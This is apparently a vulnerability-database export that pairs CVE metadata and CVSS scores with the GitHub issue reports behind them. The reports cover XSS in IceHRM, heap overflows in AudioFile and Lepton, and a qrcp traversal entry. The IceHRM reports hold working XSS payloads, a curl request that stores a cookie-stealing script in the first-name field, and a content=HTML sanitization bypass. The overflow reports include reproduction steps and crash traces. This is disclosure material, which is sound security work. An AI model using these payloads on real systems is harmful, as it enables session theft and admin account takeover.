[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gamonoid/icehrm/issues/284" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gamonoid/icehrm/issues/284" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:icehrm:icehrm:30.0.0.os:*:*:*:*:*:*:*", "matchCriteriaId": "5CC48B8B-4DDC-44AC-A809-2F88B317605E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gamonoid/icehrm/issues/284
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gamonoid", "icehrm" ]
# Important note : This vulnerability was reported to the maintainers on **Nov 23rd, 2021**, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. # Description DOM XSS in login.php GET parameter `key`. The input to `key` GET parameter is unsanitized as required for the context (javascript context ), and gets reflected in the DOM. # Proof of Concept ### Occurrence 1 : Request param `key` Request: ``` GET /login.php?key=%27;alert(document.cookie)// HTTP/1.1 Host: icehrmpro.gamonoid.com User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Alt-Used: icehrmpro.gamonoid.com Connection: keep-alive Cookie: PHPSESSID=6jua1ee8xx4s4cqcl3xxx9itr7; Upgrade-Insecure-Requests: 1 ``` Follow the link : [https://icehrmpro.gamonoid.com/login.php?key=%27;alert(document.cookie)//](https://icehrmpro.gamonoid.com/login.php?key=%27;alert(document.cookie)//) to test this vulnerability on the live demo version of the website. ### Occurence 2 : Request param `fm` The payload passed `fm` gets sanitized by PHP code. This could be bypassed by adding an extra GET param `content` with the value `HTML`. Thus backend will not sanitize any user input. ``` GET /login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML HTTP/1.1 Host: icehrmpro.gamonoid.com User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Alt-Used: icehrmpro.gamonoid.com Connection: keep-alive Cookie: PHPSESSID=6jua1ee8qu4s4cqcl3gqm9itr7; _ga=GA1.2.267929257.1637661597; _gid=GA1.2.561894500.1637661597 Upgrade-Insecure-Requests: 1 ``` Follow the link : [https://icehrmpro.gamonoid.com/login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML](https://icehrmpro.gamonoid.com/login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML) to test this vulnerability on the live demo version of the website. # Impact This vulnerability is capable of script execution on the victim's browser. It's possible to run a **keylogger** script and **capture password** of the victim user who tries to login by typing in thier credentials. # References [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting) # Occurrences 1. HTML sanitization can be bypassed with an extra `content=HTML` GET param [https://github.com/gamonoid/icehrm/blob/master/core/login.php#L357-L361](https://github.com/gamonoid/icehrm/blob/master/core/login.php#L357-L361) 2. [https://github.com/gamonoid/icehrm/blob/f44b9ec8dd60f42c9e94ac78c55d82244b74b4db/core/login.php#L213-L219](https://github.com/gamonoid/icehrm/blob/f44b9ec8dd60f42c9e94ac78c55d82244b74b4db/core/login.php#L213-L219)
Reflected XSS vulnerabilities in login.php -- can be used to leak passwords
https://api.github.com/repos/gamonoid/icehrm/issues/284/comments
1
2021-12-23T08:13:20Z
2022-01-14T20:12:38Z
https://github.com/gamonoid/icehrm/issues/284
1,087,479,274
284
3,250
CVE-2022-25014
2022-02-28T19:15:12.480
Ice Hrm 30.0.0.OS was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "m" parameter in the Dashboard of the current user. This vulnerability allows attackers to compromise session credentials via user interaction with a crafted link.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gamonoid/icehrm/issues/283" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gamonoid/icehrm/issues/283" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:icehrm:icehrm:30.0.0.os:*:*:*:*:*:*:*", "matchCriteriaId": "5CC48B8B-4DDC-44AC-A809-2F88B317605E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gamonoid/icehrm/issues/283
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gamonoid", "icehrm" ]
# Important note : This vulnerability was reported to the maintainers on **Nov 23rd, 2021**, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. # Description The input sent to GET parameter `m` gets reflected in a script generated in the page, and isn't sanitized properly, leading to a Reflected XSS vulnerability. You can try adding the payload `';alert(document.cookie);//` into the URL bar for `m` parameter, in any of the pages in IceHRM post login to see this in action. The server is taking in the content of parameter 'm', and generates the following script in the response enclosed within `<script>` tags : ```javascript $(document).ready(function() { $(".dataTables_paginate ul").addClass("pagination"); var refId = ""; refId = 'admin_Admin'; $("[ref = '"+refId+"'] a").first().click(); }); ``` The `refId` parameter has the value passed in through `m`, which is unsanitized & gets reflected in the page. # Proof of Concept 1. login to the demo dashboard at [https://icehrmpro.gamonoid.com/](https://icehrmpro.gamonoid.com/) 2. Follow the link : [https://icehrmpro.gamonoid.com/?g=admin&n=dashboard&m=admin_Admin%27;alert(document.cookie)//](https://icehrmpro.gamonoid.com/?g=admin&n=dashboard&m=admin_Admin%27;alert(document.cookie)//) # Impact A malicious actor can craft a link that - when clicked by any user logged in (admin or normal user) - can cause a Reflected XSS attack. This could lead to the leak of session credentials. # Occurences [https://github.com/gamonoid/icehrm/blob/f44b9ec8dd60f42c9e94ac78c55d82244b74b4db/core/footer.php#L126-L138](https://github.com/gamonoid/icehrm/blob/f44b9ec8dd60f42c9e94ac78c55d82244b74b4db/core/footer.php#L126-L138)
Reflected XSS vulnerability in the Dashboard page of logged-in user
https://api.github.com/repos/gamonoid/icehrm/issues/283/comments
1
2021-12-23T08:09:18Z
2022-02-08T10:13:15Z
https://github.com/gamonoid/icehrm/issues/283
1,087,476,492
283
3,251
CVE-2022-25015
2022-02-28T19:15:12.527
A stored cross-site scripting (XSS) vulnerability in Ice Hrm 30.0.0.OS allows attackers to steal cookies via a crafted payload inserted into the First Name field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gamonoid/icehrm/issues/285" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gamonoid/icehrm/issues/285" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:icehrm:icehrm:30.0.0.os:*:*:*:*:*:*:*", "matchCriteriaId": "5CC48B8B-4DDC-44AC-A809-2F88B317605E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gamonoid/icehrm/issues/285
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gamonoid", "icehrm" ]
# Important note : This vulnerability was reported to the maintainers on **Nov 23rd, 2021**, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. # Description An Authenticated user can set thier 'first name' to any unsanitized HTML or script. IceHRM website fails to effectively filter html tags present in user input. This can cause malicious input sent by a logged in user to be stored on the database. This can lead to account takeover through cookie stealing of any other user who logs into the system, no other user interation is require. # Proof of Concept PoC Video : [http://moochi.tech/jhhds34334sdsjjjsdaa/icehrm.mp4](http://moochi.tech/jhhds34334sdsjjjsdaa/icehrm.mp4) 1. Login as any user into the dashboard. 2. Send the following payload, meant for updating the 'first name' of the logged in user. You'll have to replace the `PHPSESSID` , with the session ID of any valid logged in (less privileged) user . ```curl curl 'http://127.0.0.1/icehrm/app/service.php' \ -H 'Connection: keep-alive' \ -H 'Pragma: no-cache' \ -H 'Cache-Control: no-cache' \ -H 'sec-ch-ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"' \ -H 'DNT: 1' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'User-Agent: Mozilla/5.0' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Accept: application/json, text/javascript, */*; q=0.01' \ -H 'X-Requested-With: XMLHttpRequest' \ -H 'sec-ch-ua-platform: "Linux"' \ -H 'Origin: http://127.0.0.1' \ -H 'Sec-Fetch-Site: same-origin' \ -H 'Sec-Fetch-Mode: cors' \ -H 'Sec-Fetch-Dest: empty' \ -H 'Referer: http://127.0.0.1/icehrm/app/?g=modules&&n=employees&m=modules_Personal_Information' \ -H 'Accept-Language: en-US,en;q=0.9' \ -H 'Cookie: PHPSESSID=p165r7jp664smtns7lh26tn6e8; tbl_session=lk93k2rif7jvprfqs05pqk41t65436nu' \ -H 'sec-gpc: 1' \ --data-raw 'id=2&first_name=hello%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&middle_name=&last_name=sd&nationality=2&birthday=2021-12-03&gender=Female&marital_status=Single&ssn_num=&nic_num=&other_id=&driving_license=&work_station_id=&address1=&address2=&city=&province=NULL&postal_code=&home_phone=&mobile_phone=&work_phone=&private_email=asd%40asd.com&a=add&t=Employee&content=HTML' \ --compressed ``` #3. Login into the 'admin' account & Go to the following page where the name of the less privileged user gets displayed - 'System > Users' . You'll be able to see the alert box with session cookie of 'admin' user. The extra added `content = HTML` request parameter causes the backend to ignore sanitization of user input. # Impact A less privileged user can take over 'admin' account by stealing the session cookie. # Occurrences [https://github.com/gamonoid/icehrm/blob/master/core/include.common.php#L27](https://github.com/gamonoid/icehrm/blob/master/core/include.common.php#L27) User input sanitization is not done if the 'content' parameter is set to 'HTML'
Stored XSS vulnerability in dashboard of any logged-in user
https://api.github.com/repos/gamonoid/icehrm/issues/285/comments
1
2021-12-23T08:15:18Z
2022-03-01T04:15:01Z
https://github.com/gamonoid/icehrm/issues/285
1,087,480,595
285
3,252
CVE-2022-25023
2022-02-28T19:15:12.573
Audio File commit 004065d was discovered to contain a heap-buffer overflow in the function fouBytesToInt():AudioFile.h.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/adamstark/AudioFile/issues/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/adamstark/AudioFile/issues/58" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:audio_file_project:audio_file:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2FF1257-FC62-4620-A576-3D6A9D05D91C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/adamstark/AudioFile/issues/58
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "adamstark", "AudioFile" ]
### Description A heap-buffer-overflow was discovered in function fouBytesToInt():AudioFile.h:1196 The issue is being triggered in function getIndexOfChunk() ### Version Version [004065d](https://github.com/adamstark/AudioFile/commit/004065d01e9b7338580390d4fdbfbaa46adede4e) (Lastest commit) ### Environment Ubuntu 18.04, 64bit ### Reproduce Command ``` git clone the Lastest Version firstly. mkdir build cd build && cmake .. g++ -g -fsanitize=address -o valibin a.cpp AudioFile.h ./ poc ``` #### program ``` #include <iostream> #define _USE_MATH_DEFINES #include <cmath> #include "AudioFile.h" namespace examples { void writeSineWaveToAudioFile(); void loadAudioFileAndPrintSummary(char *); void loadAudioFileAndProcessSamples(char *); } // namespace examples int main(int argc, char **argv) { examples::loadAudioFileAndPrintSummary(argv[1]); examples::loadAudioFileAndProcessSamples(argv[1]); } namespace examples { void writeSineWaveToAudioFile() { AudioFile<float> a; a.setNumChannels(2); a.setNumSamplesPerChannel(44100); //--------------------------------------------------------------- // 2. Create some variables to help us generate a sine wave const float sampleRate = 44100.f; const float frequencyInHz = 440.f; //--------------------------------------------------------------- // 3. Write the samples to the AudioFile sample buffer for (int i = 0; i < a.getNumSamplesPerChannel(); i++) { for (int channel = 0; channel < a.getNumChannels(); channel++) { a.samples[channel][i] = sin((static_cast<float>(i) / sampleRate) * frequencyInHz * 2.f * M_PI); } } //--------------------------------------------------------------- // 4. Save the AudioFile std::string filePath = "sine-wave.wav"; // change this to somewhere useful for you a.save("sine-wave.wav", AudioFileFormat::Wave); } //======================================================================= void loadAudioFileAndPrintSummary(char *file) { const std::string filePath = std::string(file); AudioFile<float> a; bool loadedOK = a.load(filePath); /** If you hit this assert then the file path above probably doesn't refer to a valid audio file */ assert(loadedOK); //--------------------------------------------------------------- // 3. Let's print out some key details std::cout << "Bit Depth: " << a.getBitDepth() << std::endl; std::cout << "Sample Rate: " << a.getSampleRate() << std::endl; std::cout << "Num Channels: " << a.getNumChannels() << std::endl; std::cout << "Length in Seconds: " << a.getLengthInSeconds() << std::endl; std::cout << std::endl; } //======================================================================= void loadAudioFileAndProcessSamples(char *file) { //--------------------------------------------------------------- std::cout << "**********************" << std::endl; std::cout << "Running Example: Load Audio File and Process Samples" << std::endl; std::cout << "**********************" << std::endl << std::endl; //--------------------------------------------------------------- // 1. Set a file path to an audio file on your machine const std::string inputFilePath = std::string(file); //--------------------------------------------------------------- // 2. Create an AudioFile object and load the audio file AudioFile<float> a; bool loadedOK = a.load(inputFilePath); /** If you hit this assert then the file path above probably doesn't refer to a valid audio file */ assert(loadedOK); //--------------------------------------------------------------- // 3. Let's apply a gain to every audio sample float gain = 0.5f; for (int i = 0; i < a.getNumSamplesPerChannel(); i++) { for (int channel = 0; channel < a.getNumChannels(); channel++) { a.samples[channel][i] = a.samples[channel][i] * gain; } } //--------------------------------------------------------------- // 4. Write audio file to disk //std::string outputFilePath = "quieter-audio-filer.wav"; // change this to somewhere useful for you //a.save(outputFilePath, AudioFileFormat::Aiff); } } // namespace examples ``` POC file at the bottom of this report. ### ASAN Report ![image](https://user-images.githubusercontent.com/15817126/152985100-063a4532-f655-46df-b7bd-e884271122ee.png) ![image](https://user-images.githubusercontent.com/15817126/152985252-26936c15-53fd-4a42-b608-ebfa141a8323.png) ### POC [POC](https://github.com/Asteriska8/Poc_Fuzzing/blob/main/poc3) Any issue plz contact with me: asteriska001@gmail.com OR: twitter: @Asteriska8
[Bug]heap-buffer-overflow in function fouBytesToInt():AudioFile.h:1196
https://api.github.com/repos/adamstark/AudioFile/issues/58/comments
2
2022-02-08T12:21:52Z
2022-08-01T20:41:30Z
https://github.com/adamstark/AudioFile/issues/58
1,127,185,345
58
3,253
CVE-2022-26181
2022-02-28T19:15:12.673
Dropbox Lepton v1.2.1-185-g2a08b77 was discovered to contain a heap-buffer-overflow in the function aligned_dealloc():src/lepton/bitops.cc:108.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1bJlHozO37c5NZ1wI0NBWh0yHHyTcfaQL/view?usp=sharing" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/dropbox/lepton" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dropbox/lepton/issues/154" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1bJlHozO37c5NZ1wI0NBWh0yHHyTcfaQL/view?usp=sharing" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/dropbox/lepton" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dropbox/lepton/issues/154" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dropbox:lepton:1.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "6DCDBF54-A4B3-4D67-A014-6ECC38D58621", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/dropbox/lepton/issues/154
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dropbox", "lepton" ]
### Description A heap-buffer-overflow was discovered in function aligned_dealloc():src/lepton/bitops.cc:108 The issue is being triggered in function reset_buffers() src/lepton/jpgcoder.cc:4373 ### Version lepton v1.0-1.2.1-185-g2a08b77 (Lastest Commit) url: https://github.com/dropbox/lepton ### Reproduce ``` Using CMAKE mkdir -p build cd build export CC="gcc" export CXX="g++" export CFLAGS="-g -fsanitize=address" export CXXFLAGS="-g -fsanitize=address" cmake .. make -j8 ./lepton -unjailed ./poc b.jpg Case 1 ./lepton -unjailed ./poc b.jpg output: attached file : image1.png Case 2 ./lepton -permissive -unjailed ./poc b.jpg output: attached file : 2.png Case 3 ./lepton ./poc b.jpg output: attached file : 3.png ``` ### POC poc file attached. ### ASAN Report ``` lepton v1.0-1.2.1-185-g2a08b77 x: Unknown Item in header instead of ZSTART ACHIEVED 1644425153 702974 TIMING (new method): 0.005493 to first byte 0.005523 total Read took: 0.000231 ================================================================= ==3721==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ffff35fe7ff at pc 0x555555584cad bp 0x7fffffffd420 sp 0x7fffffffd410 READ of size 1 at 0x7ffff35fe7ff thread T0 #0 0x555555584cac in aligned_dealloc(unsigned char*) src/lepton/bitops.cc:108 #1 0x5555555d6300 in reset_buffers() src/lepton/jpgcoder.cc:4373 #2 0x5555555bae45 in prep_for_new_file() src/lepton/jpgcoder.cc:1514 #3 0x5555555bea59 in process_file(IOUtil::FileReader*, IOUtil::FileWriter*, int, bool) src/lepton/jpgcoder.cc:1890 #4 0x5555555b6555 in app_main(int, char**) src/lepton/jpgcoder.cc:941 #5 0x55555560b796 in main src/lepton/main.cc:17 #6 0x7ffff70750b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x55555558045d in _start (/AFLplusplus/my_test/projects/lepton/fuzz/tanuki/asan_bin/lepton+0x2c45d) 0x7ffff35fe7ff is located 1 bytes to the left of 4195328-byte region [0x7ffff35fe800,0x7ffff39fec00) allocated by thread T0 here: #0 0x7ffff769c93c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226 #1 0x555555670075 in custom_malloc src/vp8/util/memory.cc:68 #2 0x555555670257 in custom_calloc src/vp8/util/memory.cc:147 #3 0x555555584b4f in abitwriter::abitwriter(int, int) src/lepton/bitops.cc:86 #4 0x5555555caa75 in recode_jpeg() src/lepton/jpgcoder.cc:3326 #5 0x5555555fb808 in bool std::__invoke_impl(std::__invoke_other, bool (*&)()) (/AFLplusplus/my_test/projects/lepton/fuzz/tanuki/asan_bin/lepton+0xa7808) #6 0x5555555f5e3b in std::enable_if >, std::is_convertible::type, bool> >::value, bool>::type std::__invoke_r(bool (*&)()) (/AFLplusplus/my_test/projects/lepton/fuzz/tanuki/asan_bin/lepton+0xa1e3b) #7 0x5555555efa22 in std::_Function_handler::_M_invoke(std::_Any_data const&) (/AFLplusplus/my_test/projects/lepton/fuzz/tanuki/asan_bin/lepton+0x9ba22) #8 0x5555555ea209 in std::function::operator()() const /usr/include/c++/10/bits/std_function.h:622 #9 0x5555555c02c5 in execute(std::function const&) src/lepton/jpgcoder.cc:2048 #10 0x5555555be59f in process_file(IOUtil::FileReader*, IOUtil::FileWriter*, int, bool) src/lepton/jpgcoder.cc:1871 #11 0x5555555b6555 in app_main(int, char**) src/lepton/jpgcoder.cc:941 #12 0x55555560b796 in main src/lepton/main.cc:17 #13 0x7ffff70750b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow src/lepton/bitops.cc:108 in aligned_dealloc(unsigned char*) Shadow bytes around the buggy address: 0x10007e6b7ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x10007e6b7cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x10007e6b7cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x10007e6b7cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x10007e6b7ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x10007e6b7cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x10007e6b7d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007e6b7d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007e6b7d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007e6b7d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007e6b7d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3721==ABORTING ``` ### Occurrences [bitops.cc L111-L124](https://github.com/dropbox/lepton/blob/2a08b777579819677e37af133f1565765d08db04/src/lepton/bitops.cc#L111-L124) ### References [attached files](https://drive.google.com/file/d/1bJlHozO37c5NZ1wI0NBWh0yHHyTcfaQL/view?usp=sharing) ### Contact me Any issue or problem plz contact with me. - asteriska001@gmail.com - Tweet. @Asteriska8
[Bug]A heap-buffer-overflow was discovered in function aligned_dealloc():src/lepton/bitops.cc:108
https://api.github.com/repos/dropbox/lepton/issues/154/comments
0
2022-02-21T11:00:57Z
2022-04-13T07:01:04Z
https://github.com/dropbox/lepton/issues/154
1,145,642,507
154
3,254
CVE-2022-26315
2022-02-28T19:15:12.717
qrcp through 0.8.4, in receive mode, allows ../ Directory Traversal via the file name specified by the uploader.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/claudiodangelis/qrcp/issues/223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/claudiodangelis/qrcp/issues/223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:qrcp_project:qrcp:*:*:*:*:*:*:*:*", "matchCriteriaId": "9127C471-EEAF-479B-9506-95C640914824", "versionEndExcluding": null, "versionEndIncluding": "0.8.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/claudiodangelis/qrcp/issues/223
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "claudiodangelis", "qrcp" ]
